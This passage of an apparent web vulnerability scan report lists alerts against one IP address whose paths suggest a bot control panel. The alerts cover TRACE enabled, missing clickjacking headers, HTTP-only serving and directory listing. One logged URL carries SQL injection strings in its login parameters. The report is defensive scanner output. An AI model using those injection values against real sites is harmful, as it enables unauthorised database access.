| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| Instances | 10 |
| Solution | Configure the web server to disable directory browsing. |
| Reference | https://cwe.mitre.org/data/definitions/548.html |
| Tags | OWASP_2021_A05, OWASP_2017_A06 |
| CWE Id | 548 |
| WASC Id | 16 |
| Plugin Id | 10033 |
| Medium | HTTP Only Site |
|---|---|
| Description | The site is only served over HTTP and not HTTPS. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 699 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 14 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 1 |
| Solution | Configure your web or application server to serve the site over TLS (HTTPS). |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html, https://letsencrypt.org/ |
| Tags | OWASP_2021_A05, WSTG-v42-SESS-02, OWASP_2017_A06 |
| CWE Id | 311 |
| WASC Id | 4 |
| Plugin Id | 10106 |
| Medium | Insecure HTTP Method - TRACE |
|---|---|
| Description | The insecure HTTP method [TRACE] is enabled for this resource, and is exploitable. The TRACK and TRACE methods may be used by an attacker to gain access to the authorisation token/session cookie of an application user, even if the session cookie is protected using the HttpOnly flag. For the attack to succeed, the application user must typically be using an older web browser, or a web browser with a Same Origin Policy (SOP) bypass vulnerability. |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 2R0Tvyu9hL9OkaP1ANptwqTDZvLLezZcVOtHikcK |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | C1dqiAR58i46kxxkCaT8D4EW6IukmEFk3CXN6jCc |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | FRmdke6T6iK96lZpSTKVrTnEPcnHmCdLKodGEcQW |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | gb2iK69Gqat7XheJo3lrfPVkAdwqXuZH3HX0ZLf2 |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | q4xRFOoFC9OldDI54eujhXZAqKYPcvmp4usnXTBh |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | R42Qj9ULBA1QxDjf0kAw4uBKBmHQJ11gipgyifkz |
| Request Header - size: 254 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 233 bytes. | |
| URL | http://142.202.242.172/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 2I2njUTA07fHPutp0cy5LYD7b3rLNVxkmAHFQKtj |
| Request Header - size: 255 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 233 bytes. | |
| URL | http://142.202.242.172/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 9les1XFsL6VR6eqgKs0dfyR16xkV0soFy3MbxWnd |
| Request Header - size: 217 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | dEyqrRMmnEa4KSXPVchQR7XLDMhPIASq0Eu4jmct |
| Request Header - size: 217 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | NnRFjbr47RVePMU3uuSflsEnSAxnwN385qzHGjn5 |
| Request Header - size: 217 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | abViMg4o7KHJOQ36hCFXYI0BAEeib4vWcH8WVP8D |
| Request Header - size: 305 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 283 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | CBlynVvPXuJAfDo5mtth3ttuUr2VjgzqciilDYyE |
| Request Header - size: 305 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 283 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | Gu99GtFi6IzvRic8kMGz6L0U5qD1YSAU6KdFsgDE |
| Request Header - size: 305 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 283 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | T4zHMQvENTWubM3MvBkFsCHsPgzmriECR1zxPt82 |
| Request Header - size: 305 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 283 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | ZmJHiCAtzQaQrejgukN1XWH2RQrucOD4QdaUC9uG |
| Request Header - size: 267 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 245 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | i4MbrtE1PUj0ltaHh6okLSbuUwHgSpQSwAdC1WQK |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 205 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | Nj92eLAdIMOu1a1J1nhSU8MoWEv1GGKjJV3enFIL |
| Request Header - size: 265 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 243 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | vLCI3cvW49VelI3bNvMIOkfci4SJExoKIVtZTSp2 |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 205 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | xWkw2N5KYFjRksznXQDjsHTNOr0XJnCRjw7Br7iF |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 205 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | zfOmljZ7hE3MCVtPxWKiQiAShby632L2FqF7SacB |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 205 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 7wbvWpdKReOt1CwNhnbNMqNNe5Odm5jF4YQD6RAJ |
| Request Header - size: 228 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 206 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | ePKPD4fYx8vNIJzgW5AVY6GGFPJXW6o6dlNR8duM |
| Request Header - size: 228 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 206 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | NKZHj7JrDHQkbK62VNKSjdsYd22qE8B5OoKKOzrb |
| Request Header - size: 228 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 206 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | yHPdmiMmb4ZM2EyI0DUGhIs2EkL99xpR42mf9Dri |
| Request Header - size: 266 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 244 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | zY38n5jdV8jyhqnQj8pstpF9KYyOvUzcHBsKfRBN |
| Request Header - size: 228 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 206 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | f84PI1L5YaW1q5RmI33Au6e9s06cN4rolKrCprpe |
| Request Header - size: 220 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 198 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | jZ7raYfnoZsXYdbjGF4htSJv7hY8ysNyFxJlknM4 |
| Request Header - size: 220 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 198 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | sSnqJWst8ZBrwqsK6WHbd6nRkMbV3mUtVs3MpYlX |
| Request Header - size: 419 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 397 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | TrsK52ivqavAD9zRC2XUrtS6DTMYXqxHfAgf5aFJ |
| Request Header - size: 754 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 732 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | XgBlQ07DGPLWIHvhAwJCDkweVKwXDt7Mll9rFacZ |
| Request Header - size: 716 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 694 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | Dwry1geRJTF3mh09e4XHs2LmioCCOxUun73gUuFX |
| Request Header - size: 287 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 265 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 8oyDtuUEBbp9LtiJGWWuiLurQXqPIaSrQlWajivU |
| Request Header - size: 489 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 467 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | X2FQFq6CA5Ia4Xw8onKuA6gFBjBLt857Z50AlOTk |
| Request Header - size: 499 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 477 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | F8MRAivj25dUIPDG4pjc5Rdc10wXRglIQoZZYsw4 |
| Request Header - size: 809 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 787 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 5HfloJwuc2DaTWjCSW9nOHn3YPdE7ewAvUEbaIE9 |
| Request Header - size: 433 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 411 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 9zw2FMrH49QmlGcFdIL8gZP9MacdNoAnXpMmFdkb |
| Request Header - size: 433 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 411 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | DBo7I0ZXAFy3JoeonIzkf7EB3phQc1wVLOeSNrzm |
| Request Header - size: 259 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 237 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | nAcf53rC2yfqA5kAWGBySxLbF9qhoJqwZ4yAucFw |
| Request Header - size: 724 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 702 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | S19UwCgu7Mr0k4YnilTm4OppshKHU5VJTFHGEVqQ |
| Request Header - size: 259 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 237 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | sY5pFoRk0sa5ZAh40ycdmQSLrvSrRjD6yRj5rsJ9 |
| Request Header - size: 433 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 411 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | zZcAsiirSXlVb8NLVgShbWCXUwzVuCussEXuZXU0 |
| Request Header - size: 686 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 664 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | KEJ81tp5GME5lfgQiq5qwDsRYhplVT26plhRG1su |
| Request Header - size: 519 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 497 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 7nm2yAFkrxrd6VV8Jd6mtN3dSD8VI3oNX9iEXamB |
| Request Header - size: 261 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 239 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | FDyue4q9h5tyCY5JMCWwHqspRpSy3lH6A1zcVObm |
| Request Header - size: 223 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 201 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | JEwMPGWAXW2IE5GZlKcJ1RhqQ3qCKK5sQEm3Lue5 |
| Request Header - size: 223 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 201 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | LBrokDjPF0IszhEGAXDeXDN6XQfKwBv9yprRBIS5 |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 235 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | bD0UyfBfsngNxWzghbP7PWI961wxOcd85lsCC898 |
| Request Header - size: 317 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 295 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | a4v4RE18hWMMDo3tEL8Fr4BgGs7To8MqVbJq8lnR |
| Request Header - size: 317 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 295 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | dGdkh03auMzlxZXcvLVFSsCrdBeLWcdmqqcWoAtw |
| Request Header - size: 317 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 295 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | LnCFLO7PLPLgxCOy4xxKbkkWsflWJEM05QiSFOTA |
| Request Header - size: 317 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 295 bytes. | |
| Instances | 50 |
| Solution | Disable insecure methods such as TRACK, TRACE, and CONNECT on the web server, and ensure that the underlying service implementation does not support insecure methods. |
| Reference | https://cwe.mitre.org/data/definitions/205.html |
| Tags | OWASP_2021_A05, WSTG-v42-CONF-06, OWASP_2017_A06 |
| CWE Id | 200 |
| WASC Id | 45 |
| Plugin Id | 90028 |
| Medium | Missing Anti-clickjacking Header |
|---|---|
| Description | The response includes neither a Content-Security-Policy header with a 'frame-ancestors' directive nor an X-Frame-Options header to protect against 'ClickJacking' attacks. |
| URL | http://142.202.242.172 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 148 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/ |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 149 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=D;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=D;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=M;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=M;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=N;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=N;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=S;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 718 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 12,091 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 90 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| Instances | 28 |
| Solution | Modern web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app. If you expect the page to be framed only by pages on your own server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive. |
| Reference | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options |
| Tags | OWASP_2021_A05, WSTG-v42-CLNT-09, OWASP_2017_A06 |
| CWE Id | 1021 |
| WASC Id | 15 |
| Plugin Id | 10020 |
| Medium | Relative Path Confusion |
|---|---|
| Description | The web server is configured to serve responses to ambiguous URLs in a manner that is likely to lead to confusion about the correct "relative path" for the URL. Resources (CSS, images, etc.) are also referenced in the page response using relative, rather than absolute, URLs. If the web browser parses the "cross-content" response permissively, or can be tricked into doing so using techniques such as framing, it may be fooled into interpreting HTML as CSS (or another content type), leading to an XSS vulnerability. |
